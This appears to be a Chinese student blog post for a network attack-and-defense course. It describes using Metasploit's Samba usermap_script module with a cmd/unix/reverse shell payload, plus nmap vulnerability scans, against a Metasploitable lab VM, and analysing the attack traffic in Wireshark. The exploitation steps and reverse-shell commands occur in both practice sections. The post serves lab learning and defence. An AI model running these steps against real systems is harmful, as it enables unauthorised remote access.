20222806 2022-2023-2 《网络攻防实践》第七次作业

已于 2023-07-07 13:29:35 修改
阅读量269 收藏
点赞数
文章标签: 网络 linux 安全
于 2023-04-26 11:25:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34529750/article/details/130378982
版权
文章介绍了渗透测试的基本概念和流程,包括信息收集、漏洞扫描、利用和清理。实践中使用Metasploit对Linux靶机的Samba服务Usermap_script漏洞进行攻击,获取主机访问权限。同时,文章还涉及攻防对抗,攻击方利用Metasploitable靶机的漏洞,而防守方通过网络监听工具如Wireshark分析攻击过程。
摘要由CSDN通过智能技术生成

实践七 Linux操作系统攻防

实践内容

实践知识:渗透攻击

渗透攻击(Penetration Testing)是一种授权的安全评估方法,旨在模拟恶意攻击者的行为,以发现计算机系统和网络中的漏洞,并提供相应的修复建议。下面是一些关于渗透攻击的知识

渗透测试目的:渗透测试的目的是评估目标系统的安全性,发现潜在的漏洞和弱点,以便组织可以采取相应的措施来修复这些问题,加强系统的安全性。

渗透测试方法:渗透测试通常包括以下步骤:
信息收集:收集与目标系统相关的信息,如域名、IP地址、子域名、网络拓扑等。
漏洞扫描:使用扫描工具对目标系统进行漏洞扫描,发现系统中可能存在的安全漏洞。
漏洞利用:利用发现的漏洞进行攻击,验证其可利用性和潜在的影响。
权限提升:在系统中获取更高权限,以便进一步探索系统的安全性。
数据采集:收集关键信息和敏感数据,如数据库内容、用户凭据等。
清理和报告:清理对目标系统的影响,并生成渗透测试报告,详细描述发现的漏洞和提供修复建议。

渗透测试类型:根据测试的范围和权限级别,渗透测试可以分为以下几种类型:
(1)黑盒测试:渗透测试人员没有关于目标系统内部结构和信息的事先了解,模拟外部攻击者进行测试。
(2)白盒测试:渗透测试人员拥有关于目标系统的详细内部信息,模拟内部攻击者进行测试。
(3)灰盒测试:渗透测试人员部分了解目标系统的信息,模拟具有一定内部知识的攻击者进行测试。

渗透测试工具:渗透测试通常使用各种工具和技术来辅助测试过程。一些常用的工具包括:
(1)Nmap:用于网络扫描和服务识别。
(2)Metasploit:一款强大的漏洞利用框架,用于开发和执行攻击代码。
(3)Burp Suite:用于Web应用程序渗透测试,包括漏洞扫描和代理攻击。
(4)Wireshark:网络协议分析工具,用于捕获和分析网络数据包。
(5)Hydra:用于暴力破解密码的工具。
(6)SQLMap:用于自动化检测和利用SQL注入漏洞的工具。

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。

(2)实践作业:攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

实践过程

(1)使用Metasploit进行Linux远程渗透攻击

虚拟机IP地址
Kali-Linux(攻击机)192.168.200.4
Metasploitable(靶机)192.168.200.7

首先是攻击机和靶机互ping
在这里插入图片描述
在这里插入图片描述
打开Kali上的Metasploit工具:
在这里插入图片描述
使用search命令搜索 search samba 用于选择合适的渗透攻击漏洞
在这里插入图片描述
找到路径exploit/multi/samba/usermap_script ,使用use命令进行加载
在这里插入图片描述
使用show payloads显示攻击载荷
选择set payload cmd/unix/reverse
在这里插入图片描述
设置攻击机和靶机的ip地址

set RHOST 192.168.200.7
set LHOST 192.168.200.4

在这里插入图片描述
攻击成功,并且成功获得权限
在这里插入图片描述

(2)实践作业:攻防对抗实践

虚拟机IP地址
Kali-Linux(攻击机)192.168.200.8
Metasploitable(靶机)192.168.200.7

使用sudo nmap -sV 192.168.200.7扫描目标主机的相关信息
在这里插入图片描述
使用nmap --script vuln 192.168.200.7来寻找存在的漏洞
在这里插入图片描述
可以看到这里有一个ccs的注入漏洞
查找到的信息有相关的来源和说明,注意到这是一个CVE编号为2014-0224的漏洞
接下来利用set payload cmd/unix/reverse漏洞进行攻击
在这里插入图片描述
成功进入
在这里插入图片描述
防守方监听:对第二次的攻击进行防守
利用wireshark对网卡进行监听,发现了这一段非法操作terminal界面后找到攻击者ip是192.168.200.8,因此输入命令进行筛选

ip.addr == 192.168.200.7 && ip.addr == 192.168.200.8

在这里插入图片描述
可以分析攻击机一开始的报文,是发送了Negotiate Protocol Request,靶机进行Negotiate Protocol Response回应。从139端口入手,这段SMB包中看到了相关的shell命令,因此可以通过这个判断是Samba的usermap_script远程命令注入漏洞
在这里插入图片描述

学习中遇到的问题及解决

因为和第六次的作业操作过程差不多,因此没有遇到什么问题

实践总结

相较第六次实践,本次实践主要在于学习和研究针对linux和Ubuntu的攻击,并且分析相关系统的漏洞与windows之间的不同

ShadowCra1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
20222925 2022-2023-2 《网络攻防实践》第八次作业
少壮不努力 老大徒伤悲
05-06 247
通过命令“md5sum Rada.exe”查看Rada.exe的摘要信息,结果为:caaa6985a43225a0b3add54f44a0d4c7或通过命令“file RaDa.exe”查看文件格式和操作环境等帮助识别同一样本的基本信息通过本次实践,我学会了通过使用PEiD、IDA等工具分析恶意代码,获取恶意代码的各项信息,对一些端口的攻击命令也更敏感,同时也提高了自我学习的能力以及从繁杂的信息中获取有用信息的能力。
20221909 2022-2023-2 《网络攻防实践》第1周作业
zxr287的博客
03-02 366
实践
20222806 2022-2023-2 《网络攻防实践》第一周作业
qq_34529750的博客
03-08 480
桥接模式桥接模式就是将主机网卡与虚拟机虚拟的网卡利用虚拟网桥进行通信。在桥接的作用下,类似于把物理主机虚拟为一个交换机,所有桥接设置的虚拟机连接到这个交换机的一个接口上,物理主机也同样插在这个交换机当中,所以所有桥接下的网卡与网卡都是交换模式的,相互可以访问而不干扰。地址转换模式在NAT模式中,主机网卡直接与虚拟NAT设备相连,然后虚拟NAT设备与虚拟DHCP服务器一起连接在虚拟交换机VMnet8上,这样就实现了虚拟机联网。Host-Only模式。
20222806 2022-2023-2 《网络攻防实践》第三周作业
qq_34529750的博客
03-22 291
使用tcpdump开源软件对在本机上访问www.tianya.cn网站过程进行嗅探,回答问题:你在访问www.tianya.cn网站首页时,浏览器将访问多少个Web服务器?查看之前的监听记录可以发现进行了多次三次握手的报文记录,而且不仅仅是访问一个tianya.cn的服务器,除此之外还访问了其他另外6个不同的IP地址的服务器。你所分析的日志文件中,攻击者使用了那种扫描方法,扫描的目标端口是什么,并描述其工作原理。输入命令snort -V可以发现能够运行了---------------------吗?
20222806 2022-2023-2 《网络攻防实践》第四周作业
qq_34529750的博客
03-29 596
再次使用Ubuntu访问Metasploitable,发现已经无法访问,说明攻击成功,其主要原理是通过发送Rst的报文强制关闭TCP对话,使得所有通过TCP协议访问靶机的连接请求全部无效。在第一周的时候kali的ip地址是由VMnet8的DHCP协议直接分配的,所以这里我们要在/etc/network/interfaces中修改掉其ip地址。直接显示来自另一个mac地址的设备使用相同的ip地址,说明在这个网段上的arp欺骗成功了。可以发现其对应的MAC地址和之前设置的MAC地址表中的内容相同。
20222806 2022-2023-2 《网络攻防实践》第五次作业
qq_34529750的博客
04-05 351
使用Snort对给定pcap文件(第4章中的解码网络扫描任一个pcap文件,之前的实践已经提供了,请在云班课中下载)进行入侵检测,并对检测的攻击进行说明。(2)只允许特定IP地址(如局域网中的Linux攻击机192.168.200.3),访问主机的某一网络服务(如FTP、HTTP、SMB),而其他的IP地址(如Windows攻击机192. 168.200.4)无法访问。1:单用户模式,root权限,用于系统维护,禁止远程登陆,就像Windows下的安全模式登录。
20222928 2022-2023-2 《网络攻防实践》第二周作业
qq_43791615的博客
03-12 226
20222928 2022-2023-2 《网络攻防实践》第二周作业
20222807 2022-2023-2 《网络攻防实践》第一周作业
cc3da的博客
03-02 183
网络攻防实践》第一周作业
20222925 2022-2023-2 《网络攻防实践》第十一次作业
少壮不努力 老大徒伤悲
05-24 308
一、实践内容 1、Web浏览的安全问题与威胁 Web浏览器软件的安全困境三要素 在复杂性方面,现代Web浏览器软件由于需要支持多种类型应用层协议、一系列页面标准规范、多种客户端执行环境,并满足大量的用户浏览需求,因此变得非常复杂和庞大。 在可扩展性方面,现代Web浏览器可能是最突可扩展特性支持的软件类型。 在连通性方面,现代Web浏览器本身就是要为用户实现“随时随地浏览互联网”。 Web浏览安全威胁 作为整个Web应用体系结构中的客户端,Web浏览器所处系统平台、Web浏览器软件及插件程序、以及使用浏览器
如何将十六进制的乱码转换成汉字
2401_85258690的博客
08-28 1013
可以看,接收到的报文第一行包含了我们想要的信息,我们需要将。在TCP通信时,抓包得到的请求报文,我们需要对其进行分析,中心思想为:剔除%,用strtol将16进制乱码进行转换。
等保测评中的安全测试方法
w13359990065的博客
08-26 776
通过物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评等多层次的综合评估,可以有效识别系统中的安全隐患,提升信息系统的整体安全防护能力,满足国家相关法律法规的要求,助力企业提升行业竞争力。在等保测评中,安全测试方法的有效实施离不开专业的测评团队和科学的测评流程。测评团队需具备丰富的安全测试经验和专业知识,能够准确识别系统中的安全风险并提切实可行的整改建议。首先,等保测评中的安全测试方法涵盖了多个层面,包括但不限于物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评。
33.python socket
笔生花的博客
08-27 1670
python socket 心跳包 数据包
Linux网络:TCP & UDP socket
盒马的博客
08-27 1198
讲解Linux中TCP与UDP的套接字相关接口
SSH是什么?
思索的涟漪,突破自我
08-28 631
SSH的工作原理可以简单理解为,它在用户和服务器之间建立了一条“安全隧道”,通过这条隧道传输的数据都被加密,防止中间人攻击或数据泄露。公钥认证的原理是用户在本地生成一对密钥,其中公钥存放在服务器上,私钥则保存在本地。在现代互联网环境中,安全性越来越受到重视,SSH凭借其强大的加密能力和灵活的认证方式,成为了维护网络安全的重要工具之一。使用SSH时,用户只需要在终端或命令行界面输入简单的命令,就可以连接到远程服务器,执行各种操作,如文件传输、远程执行命令,甚至通过端口转发实现复杂的网络功能。
SMB文件共享服务器
m0_64827698的博客
08-27 535
net share 共享名=共享文件地址 /grant:everyone ,read 创建共享⽂件(/grant 指定用户访问权限)net share 共享文件名 /delete 删除共享⽂件。⼀种使⽤服务器消息块协议(SMB)来提供⽹络上的⽂件共享服务的服务器。,然后具体的权限需求在NTFS权限中设置即可。过各⾃的远程桌⾯会话登录,这些登录也。将受共享及NTFS权限的共同影响,查看 本地⽹络连接状态。
动态代理和静态代理的区别,动态代理怎么提高网络安全
yls5yl的博客
08-28 618
动态代理通过不断变化的IP地址,不仅在网络匿名性、隐私保护和抗攻击方面具有显著优势,还能有效提升用户的网络安全性。尽管与静态代理相比,动态代理可能在稳定性方面有所欠缺,但在现代复杂的网络环境中,它依然是保障网络安全的强大工具。了解并正确使用动态代理,将帮助用户在网络世界中游刃有余,最大程度地保护自己的隐私和数据安全
配置ospf单区域
m0_70063775的博客
08-26 1157
OSPF是一种基于链路状态的路由协议,可以将链路视为路由器的接口。链路状态是对接口及接口与相邻路由器的关系的描述。例如接口的信息包括接口的IP地址、掩码、所连接的网络的类型、连接的邻居等。所有这些链路状态的集合形成链路状态数据库。OSPF共有8种状态机,分别是:Down、Attempt、Init、2-way、Exstart、Exchange、Loading、Full。邻居会话的初始阶段,表明没有在邻居失效时间间隔内收到来自邻居路由器的Hello数据包。
Linux网络编程入门及OSI七层模型
最新发布
2301_77479435的博客
08-29 656
Linux网络编程入门及OSI七层模型
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值